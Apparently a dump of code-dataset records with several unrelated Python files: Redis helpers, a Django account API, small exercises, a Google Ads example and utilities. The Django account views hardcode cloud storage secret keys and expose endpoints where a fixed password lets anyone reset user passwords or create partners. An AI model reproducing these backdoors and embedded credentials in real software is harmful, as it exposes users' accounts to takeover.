self.hget(name='DOLL_MACHINE_PLAY_SUCCESS_LOG_DATA',key=doll_id)\n details_dic = json.loads(details)\n details_dic['status'] = 4\n details_dic['post_id'] = post_id\n details_dic['post_company'] = post_company\n self.hset(name='DOLL_MACHINE_PLAY_SUCCESS_LOG_DATA',key=doll_id,content=json.dumps(details_dic))\n\n def clean_quiz_questions(self,room_id,question_ids):\n self.hdel('JC_ROOM_INNINGS',key=room_id)\n self.delete('JC_QUESTION_IDS_1_{0}'.format(room_id))\n self.delete('JC_QUESTION_IDS_2_{0}'.format(room_id))\n for x in question_ids:\n self.delete('JC_QUESTION_{0}'.format(x))\n self.delete('JC_AMOUNT_{0}'.format(x))\n\n\nclass RedisHold(BaseRedis):\n redis_host = settings.HOLD_REDIS_CONFIG['host']\n redis_port = settings.HOLD_REDIS_CONFIG['port']\n\n\n def clean_redis_user_detail(self, user_id):\n # 清除用户信息\n self.delete(key='CACHED_USER_PROPERTIES_{0}'.format(user_id))\n self.hdel(name='USERID', key=user_id)\n Redis().clean_user_bean(user_id)\n\n def clean_redis_room_detail(self, room_id, anchor_id):\n # 清除房间信��\n self.hdel(name='ROOM', key=room_id)\n self.hdel(name='ANCHOR_ROOM', key=anchor_id)\n self.delete(key='RANK_ANCHOR_COST_{0}'.format(anchor_id))\n\n def add_user_package_gift(self,user_id, gift_id, gift_num):\n # 添加背包礼物\n self.hset(name='CACHED_USER_PROPERTIES_{0}'.format(user_id), key='package_{0}'.format(gift_id), content=gift_num)\n","sub_path":"utilities/redis_helper.py","file_name":"redis_helper.py","file_ext":"py","file_size_in_byte":7533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"548175646","text":"import sys\r\n\r\n\r\n\r\ndef _fix_date(periodo, fecha):\r\n rt = 0\r\n\r\n if len(periodo) != 6 or len(fecha) == 0:\r\n print(f\"el periodo: {periodo} o la fecha: {fecha}, error!\")\r\n sys.exit(0)\r\n\r\n year = periodo[:4]\r\n month = periodo[4:]\r\n\r\n if \"-\" in fecha:\r\n spl_fc = fecha.split(\"-\")\r\n if len(spl_fc) == 3:\r\n\r\n fc_y = spl_fc[0]\r\n fc_m = spl_fc[1]\r\n fc_d = spl_fc[2]\r\n\r\n rt = f\"{year}-{month}-{fc_d}\"\r\n else:\r\n print(f\" fecha: {fecha}, formato invalido\")\r\n sys.exit(0)\r\n else:\r\n print(f\" fecha: {fecha}, formato invalido\")\r\n sys.exit(0)\r\n return rt\r\n\r\ndef main():\r\n periodo = \"201907\"\r\n fecha = \"2555-22-11\"\r\n print(_fix_date(periodo, fecha))\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"app/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"235942280","text":"# -*- coding: utf-8 -*-\nimport re\nfrom django.contrib.auth.models import AnonymousUser\nfrom django.db import transaction\nfrom django.utils.decorators import method_decorator\nfrom qiniu import Auth\nfrom rest_framework import viewsets\nfrom authtoken.authentication import TokenAuthentication\nfrom rest_framework.decorators import api_view, detail_route\nfrom rest_framework.mixins import UpdateModelMixin\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\nfrom authtoken.models import Token\nfrom rest_framework.decorators import authentication_classes, permission_classes\nfrom dynamic_rest.viewsets import WithDynamicViewSetMixin, DynamicModelViewSet\nfrom common import appcodes\nfrom pay.models import PointPay\nfrom chaolife.exceptions import UserCheck\nfrom account.models import User, PartnerMember, CustomerMember, BillHistory\nfrom account.models import Installation\nfrom account.serializers import CustomerUserSerializer, UpdateMemberSerializer, BillHistorySerializer, \\\n PartnerUserSerializer\nfrom chaolife.serializers import InstallationSerializer\nfrom chaolife.tasks import notify_user, createRoomDaysetsFormRoomPackage, checkHousePackageState\nfrom common.utils.AppJsonResponse import DefaultJsonResponse\nfrom common.decorators import method_route, parameter_necessary, is_authenticated\nfrom chaolife.exceptions import PermissionDenied\nfrom common import exceptions\nfrom sms import config as smsConfig\nfrom sms.client import RegisterSmsRequest, GetLoginSmsRequest, VertifySmsRequest\nfrom account.service import RegisterSmsChecker, LoginSmsChecker, VertifySmsChecker\nfrom sms.models import SmsRecord\nfrom ..utils.appletest import isTestAccount\nfrom ..service import vertifySmsCode\nfrom common import R\nfrom common.R import METHOD\nimport base64\naccess_key = 'u-ryAwaQeBx9BS5t8OMSPs6P1Ewoqiu6-ZbbMNYm'\nsecret_key = 'hVXFHO8GusQduMqLeYXZx_C5_c7D-VSwz6AKhjZJ'\n\n\nclass UserViewSet(WithDynamicViewSetMixin, UpdateModelMixin, viewsets.GenericViewSet):\n serializer_class = CustomerUserSerializer\n queryset = User.objects.all()\n\n @method_route(methods=['POST', 'GET'], url_path='sms/register', )\n @method_decorator(parameter_necessary('phone_number', ))\n def get_register_sms(self, request, phone_number, *args, **kwargs):\n sms_request = RegisterSmsRequest(phone_number=phone_number)\n sms_request.perform_request()\n sms_record = sms_request.get_smsRecord()\n return DefaultJsonResponse(message=R.String.VERTIFY_SMS_SENT, data={'business_id': sms_record.business_id})\n\n @method_route(methods=['POST', ], url_path='register')\n @transaction.atomic()\n @method_decorator(parameter_necessary('phone_number', 'smsCode', 'business_id', ))\n def register(self, request, *args, **kwargs):\n phone_number = request.POST.get('phone_number')\n\n if User.existPhoneNumber(phone_number, raise_exception=False):\n return DefaultJsonResponse(code=appcodes.CODE_PHONE_IS_EXIST, message=R.String.PHONE_EXISTED)\n\n if (isTestAccount(phone_number) or vertifySmsCode(request, SmsRecord.BUSINESS_TYPE_REGISTE)):\n try:\n # todo 测试\n if request.POST.get('test', None):\n user = User.objects.create(phone_number=phone_number)\n user.role = user.HOTEL_PARTNER\n user.save()\n PartnerMember.objects.create(user=user)\n from chaolife.serializers.user import UserSerializer\n serializer = UserSerializer(user)\n else:\n member = CustomerMember.objects.create(phone_number)\n user = member.user\n serializer = CustomerUserSerializer(user, )\n # end\n token = Token.create_for_mobile_client(user, request.client_type)\n # warn 测试\n inviter = request.POST.get('inviter')\n print('邀请者是{}'.format(inviter))\n if inviter:\n from account.invitation.service import invited_service\n invited_service(inviter, user)\n user.save()\n user_data = {'user': serializer.data}\n except BaseException as e:\n # raise e\n raise e\n else:\n # 都没出错\n response = DefaultJsonResponse(data=user_data, code=appcodes.CODE_100_OK,\n message=R.String.REGISTER_SUCCESS)\n response['token'] = token\n return response\n else:\n return DefaultJsonResponse(code=appcodes.CODE_SMS_ERROR, message=R.String.REGISTER_SMS_VERTIFY_FAILED)\n\n @method_route(methods=['POST', 'GET'], url_path='sms/login')\n @method_decorator(parameter_necessary('phone_number', ))\n def get_login_sms(self, request, phone_number, *args, **kwargs):\n User.existPhoneNumber(phone_number)\n sms_request = GetLoginSmsRequest(phone_number=phone_number)\n sms_request.perform_request()\n sms_record = sms_request.get_smsRecord()\n return DefaultJsonResponse(message=R.String.SMS_SEND, data={'business_id': sms_record.business_id})\n\n @method_route(methods=['POST', 'GET'], url_path='sms/reset-pay-pwd', permission_classes=(IsAuthenticated,))\n def get_reset_pay_pwd_sms(self, request, *args, **kwargs):\n sms_request = VertifySmsRequest(phone_number=request.user.phone_number,\n template_code=smsConfig.template_reset_pay_pwd_code)\n sms_request.perform_request()\n sms_record = sms_request.get_smsRecord()\n return DefaultJsonResponse(message=R.String.SMS_SEND, data={'business_id': sms_record.business_id})\n\n @method_route(methods=['POST', ], url_path='reset-pay-pwd', permission_classes=(IsAuthenticated,))\n @method_decorator(parameter_necessary('pay_pwd', ))\n def reset_pay_pwd(self, request, pay_pwd, ):\n vertifySmsCode(request, SmsRecord.BUSINESS_TYPE_RESET_PAY_PWD)\n request.user.set_pay_pwd(pay_pwd)\n return DefaultJsonResponse(message=R.String.MODIFY_PAY_PWD_SUCCESS)\n\n @method_route(methods=['POST', ], url_path='login')\n @method_decorator(parameter_necessary('phone_number', 'smsCode', 'business_id'))\n def login(self, request, *args, **kwargs):\n # from common import fixutils\n # from order.tasks import check_expired_order,check_should_tag_checkout_order,check_should_checkin_order,order_point_to_seller_account\n phone_number = request.POST.get('phone_number')\n try:\n user = User.objects.get(phone_number=phone_number)\n if (isTestAccount(phone_number) or vertifySmsCode(request, SmsRecord.BUSINESS_TYPE_LOGIN)):\n from authtoken.models import Token\n token = Token.create_for_mobile_client(user=user, client_type=request.client_type)\n response = DefaultJsonResponse(data={'user': self._get_serialize_data(request, user)})\n response['token'] = token.key\n return response\n else:\n return DefaultJsonResponse(message=R.String.VERTIFY_FAILED, code=appcodes.CODE_USER_AUTHENTICATE_FAIL)\n except User.DoesNotExist:\n return DefaultJsonResponse(message=R.String.VERTIFY_FAILED, code=appcodes.CODE_USER_NOT_EXIST)\n\n @method_route(methods=['GET'], permission_classes=(IsAuthenticated,))\n def logout(self, request, *args, **kwargs):\n print(request.user)\n if (isinstance(request.user, AnonymousUser)):\n return Response('都没登入过叫个锤子啊')\n else:\n return DefaultJsonResponse(code=100, message=\"退出成功\")\n\n @method_route(methods=['POST', ], url_path='password', permission_classes=(IsAuthenticated,))\n @method_decorator(parameter_necessary('phone_number', 'password', 'newPassword'))\n def change_password(self, request, *args, **kwargs):\n phone_number = request.POST['phone_number']\n password = request.POST['password']\n new_password = request.POST['newPassword']\n UserCheck.validate_pwd(password)\n try:\n user = User.objects.get(phone_number=phone_number)\n if (user.check_password(password)):\n user.set_password(new_password)\n user.save()\n return DefaultJsonResponse(message=R.String.MODIFY_SUCCESS)\n else:\n return DefaultJsonResponse(message=R.String.MODIFY_PAY_PWD_FAILED,\n code=appcodes.CODE_USER_AUTHENTICATE_FAIL)\n except User.DoesNotExist:\n raise PermissionDenied() # warn 可能是非法测试\n\n @method_route(methods=['PUT', 'POST'], url_path='profile/update', permission_classes=(IsAuthenticated,))\n @method_decorator(is_authenticated())\n def update_profile(self, request, *args, **kwargs):\n if (request.method == 'GET'):\n return self.get_profile(request, *args, **kwargs)\n s = UpdateMemberSerializer(data=request.data)\n s.is_valid()\n if (s.is_valid()):\n instance = s.update(request.user, s.validated_data, )\n return DefaultJsonResponse(message=R.String.MODIFY_SUCCESS,\n data={'user': CustomerUserSerializer(instance).data})\n else:\n return DefaultJsonResponse(message='修改失败{0}'.format(s.errors.values), code='-100')\n\n @method_route(methods=['POST'], url_path='installation')\n def installationId_register(self, request, *args, **kwargs):\n json = request.data\n serializer = InstallationSerializer(data=json)\n if serializer.is_valid():\n serializer.save()\n return DefaultJsonResponse(code=appcodes.CODE_100_OK, message=R.String.UPLOAD_SUCCESS)\n else:\n print(serializer.errors)\n return DefaultJsonResponse(code=appcodes.CODE_NEGATIVE_100_APP_ERROR, message=str(serializer.errors))\n\n @method_route(methods=['POST'], url_path='installation/bind', permission_classes=(IsAuthenticated,))\n def bind_installationId(self, request, *args, **kwargs):\n serializer = InstallationSerializer(data=request.data, )\n if serializer.is_valid(raise_exception=True):\n installation = serializer.save()\n installation.user = request.user\n installation.save(update_fields=('user',))\n Installation.check_count_limit(user=request.user)\n else:\n return DefaultJsonResponse(code=appcodes.CODE_INSTALLATION_BIND_FAILED, message=serializer.errors)\n return DefaultJsonResponse(code=appcodes.CODE_100_OK, message=\"success\")\n\n @method_route(methods=['POST', ], url_path='avatar/update_callback')\n def update_user_avatar_callback(self, request, *args, **kwargs):\n \"\"\"\n 采用 用户发起请求,获取token,客户端得到token往 七牛云上传图片,七牛云回调我方接口的调用流程\n 这个接口是 在用户上传之后 ,七牛云回调的我方接口\n :param request:\n :return:\n \"\"\"\n post_data = request.POST\n f_name = post_data.get('filename')\n f_size = post_data.get('filesize')\n print('callback avatar name is {}'.format(f_name))\n print('callback avatar f_size is {}'.format(f_size))\n phone_number = re.match('avatar/avatar_(?P\\d+).*', f_name).group('id')\n print(phone_number)\n try:\n user = User.objects.get(phone_number=phone_number)\n user.customermember.update_avatar_url(f_name)\n print('update avatar success')\n except User.DoesNotExist:\n return Response('doestnot exist user')\n return Response('OK')\n\n @method_route(methods=['GET', ], url_path='avatar/token', permission_classes=(IsAuthenticated,))\n def avatar_token(self, request, *args, **kwargs):\n q = Auth(access_key, secret_key)\n bucket_name = 'hotelbook'\n phone_number = request.user.phone_number\n imageName = 'avatar/avatar_' + str(phone_number) + '.jpg'\n key = imageName\n policy = {\n 'callbackUrl': 'agesd.com/user/avatar/update_callback/',\n 'callbackBody': 'filename=$(fname)&filesize=$(fsize)'\n }\n\n token = q.upload_token(bucket_name, key, 3600, policy)\n return DefaultJsonResponse(code=appcodes.CODE_100_OK,\n data={'upload_token': token, 'imageUrl': key})\n\n @method_route(methods=['GET', ], url_path='profile', permission_classes=(IsAuthenticated,))\n def get_profile(self, request, *args, **kwargs):\n data = self.get_serializer_class()(request.user, ).data\n return DefaultJsonResponse(data={'user': data})\n\n def get_serializer_class(self):\n if self.request.client_type == 'business':\n return PartnerUserSerializer\n elif self.request.client_type == 'client':\n return CustomerUserSerializer\n\n def _get_serialize_data(self, request, user):\n if (user.is_partner_member and request.client_type == 'business'):\n if not PartnerMember.objects.filter(user=user).exists():\n PartnerMember(user=user).save()\n return PartnerUserSerializer(user).data\n elif (request.client_type == 'client'):\n if user.is_partner_member and not CustomerMember.objects.filter(user=user).exists():\n CustomerMember(user=user, ).save()\n return CustomerUserSerializer(user).data\n else: # todo 是否有该情况\n raise exceptions.ConditionDenied(detail=R.String.PERMISSION_NO_POWER, code=-100)\n\n @detail_route(methods=['GET', ], url_path='partner/invoice', permission_classes=(IsAuthenticated,))\n def get_can_invoice(self, request, pk):\n return DefaultJsonResponse(data={'invoice': request.user.partnermember.invoice})\n\n @method_route(methods=[METHOD.POST, ], url_path='secretLogin')\n def get_token(self, request, ):\n phoneNumber = request.POST.get('phone_number')\n timestamp = request.POST.get('timestamp')\n secret_code = request.POST.get('secret_code')\n import datetime\n from datetime import timedelta\n from chaolife.utils import cryptoutils\n client_date = datetime.datetime.fromtimestamp(int(timestamp))\n now_date = datetime.datetime.now()\n pre_str = phoneNumber + ':' + timestamp + \":chaojimima132476\"\n if now_date - client_date < timedelta(minutes=5) \\\n and cryptoutils.rsa_decrypt(secret_code) == pre_str:\n try:\n user = User.objects.get(phone_number=phoneNumber)\n token = Token.create_for_mobile_client(user=user, client_type=request.client_type)\n response = DefaultJsonResponse(data={'user': self._get_serialize_data(request, user)})\n response['token'] = token.key\n return response\n except User.DoesNotExist:\n return DefaultJsonResponse(code=-100, message=R.String.VERTIFY_FAILED)\n else:\n return DefaultJsonResponse(code=-100, message=R.String.VERTIFY_FAILED)\n\n\n@permission_classes(IsAuthenticated, )\n@authentication_classes(TokenAuthentication, )\n@api_view(('POST',))\ndef client_user_login(request, ):\n user = request.user\n if user.is_customer_member:\n pass\n elif user.is_partner_member:\n pass\n\n\n@api_view(('POST',))\ndef admin_changePassword(request, ):\n if request.POST.get('admin') == '8995588':\n phone_number = request.POST.get('phone_number')\n print(phone_number)\n user = User.objects.get(phone_number=phone_number)\n user.set_password(request.POST.get('password'))\n user.save()\n return Response('success')\n\n\n@api_view(('POST',))\ndef create_partner(request, ):\n if request.POST.get('admin') == '8995588':\n phone_number = request.POST.get('phone_number')\n name = request.POST.get('name')\n # 押金\n points = request.POST.get('points')\n with transaction.atomic():\n try:\n user = User.objects.get(phone_number=phone_number)\n user.role = User.HOTEL_PARTNER\n user.save()\n if not PartnerMember.objects.filter(user=user).exists():\n PartnerMember.objects.create(user=user)\n partnerMember = user.partnermember\n except User.DoesNotExist:\n user = User.objects.create(phone_number=phone_number, name=name, role=User.HOTEL_PARTNER)\n print(user)\n partnerMember = PartnerMember.objects.create(user=user)\n CustomerMember.objects.create_for_exist_user(user)\n partnerMember.deposit_points = points\n partnerMember.save(update_fields=('deposit_points',))\n return Response('success')\n else:\n return Response('滚')\n","sub_path":"chaolife/account/views/account.py","file_name":"account.py","file_ext":"py","file_size_in_byte":17016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"192049734","text":"#Hamlet.py\ndef main():\n txt = getText(\"Hamlet.txt\")\n counts = {}\n item = Statistics(txt, counts)\n printInfo(item)\n\ndef getText(file):\n f = open(file, \"r\")\n txt = f.read()\n txt = txt.lower()\n for ch in '~!@#$%^&*()_+|}{:?><\",./;[]\\=-`':\n txt.replace(ch, \"\")\n f.close()\n return txt\n\ndef Statistics(txt, counts):\n words = txt.split()\n for word in words:\n counts[word] = counts.get(word, 0) + 1\n item = list(counts.items())\n item.sort(key = lambda x:x[1], reverse = True)#\n return item\n\ndef printInfo(item):\n for i in range(10):\n word, count = item[i]\n print(\"{:<10} {:>5}\".format(word, count))\nmain()\n","sub_path":"1《Python语言程序设计基础(第2版)》MOOC/第六章_组合数据类型/Hamlet.py","file_name":"Hamlet.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"601785606","text":"import argparse\nimport math\nimport numpy as np\nimport random\n# import sympy as sp\nfrom helpers import save, load\nfrom ProblemInstances import find_derivatives\nfrom wdnf import Taylor\n# from ProblemInstances import DiversityReward, QueueSize, InfluenceMaximization, FacilityLocation, derive\n# from scipy.misc import derivative\nimport matplotlib\nimport matplotlib.pyplot as plt\nmatplotlib.use('Agg')\n\n\n# def taylor(fun, degree, center):\n# estimated_fun = [((fun.diff(x, i).subs(x, center)) * (x - center)**i) / math.factorial(i)\n# for i in range(degree + 1)]\n# estimated_fun = sum(estimated_fun)\n# return estimated_fun\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Test Module for ...',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument('--problem', type=str, help='If the problem instance is created before, provide it here to save'\n ' time instead of recreating it.')\n args = parser.parse_args()\n num_of_samples = 100\n # graphs = load('datasets/one_graph_file')\n newProblem = load(args.problem) # InfluenceMaximization(graphs, 1)\n\n # print(\"g^2(x) is: \" + str((g**2).coefficients))\n\n # x = sp.Symbol('x')\n # f = sp.ln(x + 1)\n # x_lims = [0, 1]\n vectors = []\n for n in range(num_of_samples):\n binary_vector = map(int, list(bin(random.getrandbits(newProblem.problemSize))[2:]))\n if len(binary_vector) < newProblem.problemSize:\n binary_vector = [0] * (newProblem.problemSize - len(binary_vector)) + binary_vector\n # random_list = random.getrandbits(newProblem.problemSize)\n y = dict(zip(newProblem.groundSet, binary_vector))\n vectors.append(y)\n # x1 = [{1: 0.0, 2: 0.0, 3: 0.0}, {1: 0.0, 2: 0.0, 3: 1.0}, {1: 0.0, 2: 1.0, 3: 0.0}, {1: 0.0, 2: 1.0, 3: 1.0},\n # {1: 1.0, 2: 0.0, 3: 0.0}, {1: 1.0, 2: 0.0, 3: 1.0}, {1: 1.0, 2: 1.0, 3: 0.0}, {1: 1.0, 2: 1.0, 3: 1.0}]\n # y1 = []\n center = 0.5\n degrees = range(1, 11)\n avg_errs = []\n for j in degrees:\n expanded_f = newProblem.get_polynomial_estimator(0.5, j).my_wdnf\n # print('expanded f at degree = ' + str(j) + ' is ' + str(expanded_f.coefficients))\n # for g in newProblem.wdnf_dict:\n # fun = taylor(f, j, 0.5)\n # print(sp.expand(fun))\n # y1 = [fun.subs(x, k) for k in x1]\n derivatives = find_derivatives(np.log1p, center, j)\n my_taylor = Taylor(j, derivatives, center)\n error = 0.0\n for y in vectors:\n # print('for x = ' + str(y))\n # print('expanded f at n = ' + str(j) + ' is ' + str(expanded_f(y)))\n # print('f at n = ' + str(j) + ' is ' + str(fun.subs(x, g(y))))\n final_value = [(1.0 / newProblem.instancesSize) * my_taylor(newProblem.wdnf_dict[g](y)) for g in\n range(newProblem.instancesSize)]\n final_value = sum(final_value)\n error += abs(expanded_f(y) - final_value)\n error = error / num_of_samples\n avg_errs.append(error)\n print('Average error at L = ' + str(j) + ' is ' + str(error))\n output_dir = 'results/plots/tests/taylor/'\n if not os.path.exists(output_dir):\n os.makedirs(output_dir)\n plt.figure()\n plt.plot(degrees, avg_errs)\n plt.xlabel('L')\n plt.ylabel(r'$\\frac{1}{n} \\sum |\\tilde{f}(x) - \\hat{f_L}(g(x))|$')\n plt.title(r'Average error between \\tilde{f}(x) and $\\hat{f_L}(g(x))$')\n plt.show()\n plt.savefig(output_dir + 'AvgErrExpTaylorApprox.png', bbox_inches=\"tight\")","sub_path":"code/ExpandedTaylorApproximator.py","file_name":"ExpandedTaylorApproximator.py","file_ext":"py","file_size_in_byte":3635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"634590785","text":"from .exceptions import *\n\nimport random\n\n# Complete with your own, just for fun :)\nLIST_OF_WORDS = [\"cool\", \"awesome\", \"crazy\"]\n\n\ndef _get_random_word(list_of_words):\n if len(list_of_words) == 0:\n raise InvalidListOfWordsException()\n \n if len(list_of_words) == 1:\n return list_of_words[0]\n else: \n rnd = random.randint(0,len(list_of_words)-1)\n return list_of_words[rnd]\n\n\ndef _mask_word(word):\n if len(word) == 0:\n raise InvalidWordException()\n \n \n return \"*\" * len(word)\n\n\ndef _uncover_word(answer_word, masked_word, character):\n if answer_word == \"\" or masked_word == \"\":\n raise InvalidWordException()\n \n elif len(character) > 1:\n raise InvalidGuessedLetterException()\n \n elif len(answer_word) != len(masked_word):\n raise InvalidWordException()\n \n \n word = \"\"\n if character.lower() in answer_word.lower():\n for i in range(len(answer_word)):\n if answer_word[i].lower() == character.lower():\n word += character.lower()\n else:\n word += masked_word[i].lower()\n else: \n word = masked_word\n\n return word\n \n \n\n\ndef guess_letter(game, letter):\n if game[\"answer_word\"] == game[\"masked_word\"]:\n raise GameFinishedException()\n if game[\"remaining_misses\"] == 0:\n raise GameFinishedException()\n \n word = game[\"masked_word\"]\n \n game[\"masked_word\"] = _uncover_word(game[\"answer_word\"], game[\"masked_word\"], letter)\n \n if word == game[\"masked_word\"]:\n game[\"remaining_misses\"] -= 1\n \n letter = letter.lower() \n game[\"previous_guesses\"].append(letter)\n \n if game[\"masked_word\"] == game[\"answer_word\"]:\n raise GameWonException()\n if game[\"remaining_misses\"] == 0:\n raise GameLostException()\n \n return game\n \n \n \n\n\ndef start_new_game(list_of_words=None, number_of_guesses=5):\n if list_of_words is None:\n list_of_words = LIST_OF_WORDS\n\n word_to_guess = _get_random_word(list_of_words)\n masked_word = _mask_word(word_to_guess)\n game = {\n 'answer_word': word_to_guess,\n 'masked_word': masked_word,\n 'previous_guesses': [],\n 'remaining_misses': number_of_guesses,\n }\n\n return game\n","sub_path":"hangman/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":2564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"652845416","text":"#1_ (DESAFIO) Escreva um programa em que dados “x” segundos fornecidos pelo usuário, sejam fornecidas as quantidades de horas, minutos e segundos.\r\n\r\n#R_\r\n\r\nimport math\r\n\r\nprint('Esse programa transforma o valor X que sera o valor de segundos e dividira o valor entre horas, minutos e segundos.')\r\n\r\nX = int(input('O valor de X em segundos e igual a: '))\r\n\r\nHORAS = math.floor(X / 60 ** 2) \r\n\r\nRESTO_DAS_HORAS = X % 60 ** 2\r\n\r\nMINUTOS = math.floor(RESTO_DAS_HORAS / 60)\r\n\r\nSEGUNDOS = RESTO_DAS_HORAS % 60\r\n\r\nprint('São', HORAS, 'horas,', MINUTOS, 'minutos e', SEGUNDOS, 'segundos.')","sub_path":"Segundo Capítulo/EXERCÍCIOS_12.py","file_name":"EXERCÍCIOS_12.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"89787847","text":"#!/usr/bin/env python\n# Copyright 2020 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Demonstrates how to search for language and mobile carrier constants.\n\nSpecifically, this example illustrates how to:\n1. Search for language constants where the name includes a given string.\n2. Search for all the available mobile carrier constants with a given country\n code.\n\"\"\"\n\n\nimport argparse\nimport sys\n\nfrom google.ads.googleads.client import GoogleAdsClient\nfrom google.ads.googleads.errors import GoogleAdsException\n\n\ndef main(client, customer_id, language_name, carrier_country_code):\n \"\"\"Demonstrates how to search for language and mobile carrier constants.\n\n Args:\n client: An initialized Google Ads API client.\n customer_id: The Google Ads customer ID.\n language_name: String included in the language name to search for.\n carrier_country_code: String code of the country where the mobile\n carriers are located.\n \"\"\"\n search_for_language_constants(client, customer_id, language_name)\n search_for_carrier_constants(client, customer_id, carrier_country_code)\n\n\ndef search_for_language_constants(client, customer_id, language_name):\n \"\"\"Searches for language constants where the name includes a given string.\n\n Args:\n client: An initialized Google Ads API client.\n customer_id: The Google Ads customer ID.\n language_name: String included in the language name to search for.\n \"\"\"\n # Get the GoogleAdsService client.\n googleads_service = client.get_service(\"GoogleAdsService\")\n\n # Create a query that retrieves the language constants where the name\n # includes a given string.\n query = f\"\"\"\n SELECT\n language_constant.id,\n language_constant.code,\n language_constant.name,\n language_constant.targetable\n FROM language_constant\n WHERE language_constant.name LIKE '%{language_name}%'\"\"\"\n\n # Issue a search request and process the stream response to print the\n # requested field values for the carrier constant in each row.\n stream = googleads_service.search_stream(\n customer_id=customer_id, query=query\n )\n\n for batch in stream:\n for row in batch.results:\n print(\n f\"Language with ID {row.language_constant.id}, \"\n f\"code '{row.language_constant.code}', \"\n f\"name '{row.language_constant.name}', \"\n f\"and targetable '{row.language_constant.targetable}' \"\n \"was found.\"\n )\n\n\ndef search_for_carrier_constants(client, customer_id, carrier_country_code):\n \"\"\"Searches for mobile carrier constants with a given country code.\n\n Args:\n client: An initialized Google Ads API client.\n customer_id: The Google Ads customer ID.\n carrier_country_code: String code of the country where the mobile\n carriers are located.\n \"\"\"\n # Get the GoogleAdsService client.\n googleads_service = client.get_service(\"GoogleAdsService\")\n\n # Create a query that retrieves the targetable carrier constants by country\n # code.\n query = f\"\"\"\n SELECT\n carrier_constant.id,\n carrier_constant.name,\n carrier_constant.country_code\n FROM carrier_constant\n WHERE carrier_constant.country_code = '{carrier_country_code}'\"\"\"\n\n # Issue a search request and process the stream response to print the\n # requested field values for the carrier constant in each row.\n stream = googleads_service.search_stream(\n customer_id=customer_id, query=query\n )\n\n for batch in stream:\n for row in batch.results:\n print(\n f\"Carrier with ID {row.carrier_constant.id}, \"\n f\"name '{row.carrier_constant.name}', \"\n f\"and country code '{row.carrier_constant.country_code}' \"\n \"was found.\"\n )\n\n\nif __name__ == \"__main__\":\n # GoogleAdsClient will read the google-ads.yaml configuration file in the\n # home directory if none is specified.\n googleads_client = GoogleAdsClient.load_from_storage(version=\"v14\")\n\n parser = argparse.ArgumentParser(\n description=(\n \"Demonstrates how to search for language and mobile carrier \"\n \"constants.\"\n )\n )\n # The following argument(s) should be provided to run the example.\n parser.add_argument(\n \"-c\",\n \"--customer_id\",\n type=str,\n required=True,\n help=\"The Google Ads customer ID.\",\n )\n parser.add_argument(\n \"-l\",\n \"--language_name\",\n type=str,\n required=False,\n default=\"eng\",\n help=\"Optional, string included in the language name to search for.\",\n )\n parser.add_argument(\n \"-p\",\n \"--carrier_country_code\",\n type=str,\n required=False,\n default=\"US\",\n help=(\n \"Optional, string code of the country where the mobile carriers \"\n \"are located, e.g. 'US', 'ES', etc. \"\n \"A list of country codes can be referenced here: \"\n \"https://developers.google.com/google-ads/api/reference/data/geotargets\"\n ),\n )\n args = parser.parse_args()\n\n try:\n main(\n googleads_client,\n args.customer_id,\n args.language_name,\n args.carrier_country_code,\n )\n except GoogleAdsException as ex:\n print(\n f'Request with ID \"{ex.request_id}\" failed with status '\n f'\"{ex.error.code().name}\" and includes the following errors:'\n )\n for error in ex.failure.errors:\n print(f'\\tError with message \"{error.message}\".')\n if error.location:\n for field_path_element in error.location.field_path_elements:\n print(f\"\\t\\tOn field: {field_path_element.field_name}\")\n sys.exit(1)\n","sub_path":"examples/targeting/search_for_language_and_carrier_constants.py","file_name":"search_for_language_and_carrier_constants.py","file_ext":"py","file_size_in_byte":6426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"471686917","text":"import logging\nimport os\nimport subprocess\nimport glob\n\ndef setLogger(mode, module):\n \"\"\"Define the log that we will use.\"\"\"\n\n # create logger with 'spam_application'\n logger = logging.getLogger(module)\n logger.setLevel(logging.DEBUG)\n\n log = logging.StreamHandler()\n\n # Select the mode\n if mode is 'Debug':\n log.setLevel(level=logging.DEBUG)\n elif mode is 'Production':\n log.setLevel(level=logging.INFO)\n\n formatter = logging.Formatter('#[%(levelname)s] - %(name)s - %(message)s')\n log.setFormatter(formatter)\n\n logger.addHandler(log)\n\n # read database here\n logger.info(\"Entering \" + mode + \" mode\")\n\n return(logger)\n\n\ndef setMode(args):\n if args.d is True:\n mode = 'Debug'\n else:\n mode = 'Production'\n\n return(mode)\n\n\ndef check_input(starting_files, logger):\n if type(starting_files) == str:\n if not os.path.exists(starting_files):\n logger.error('Input file does not exists -> ' + starting_files)\n exit(1)\n\n elif type(starting_files) == list:\n for in_file in starting_files:\n if not os.path.exists(in_file):\n logger.error('Input file does not exists -> ' + in_file)\n exit(1)\n\n\ndef run_cmd(cmd, output=0):\n if output != 0:\n process = subprocess.Popen(cmd, shell=True, executable='/bin/bash', stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n out = 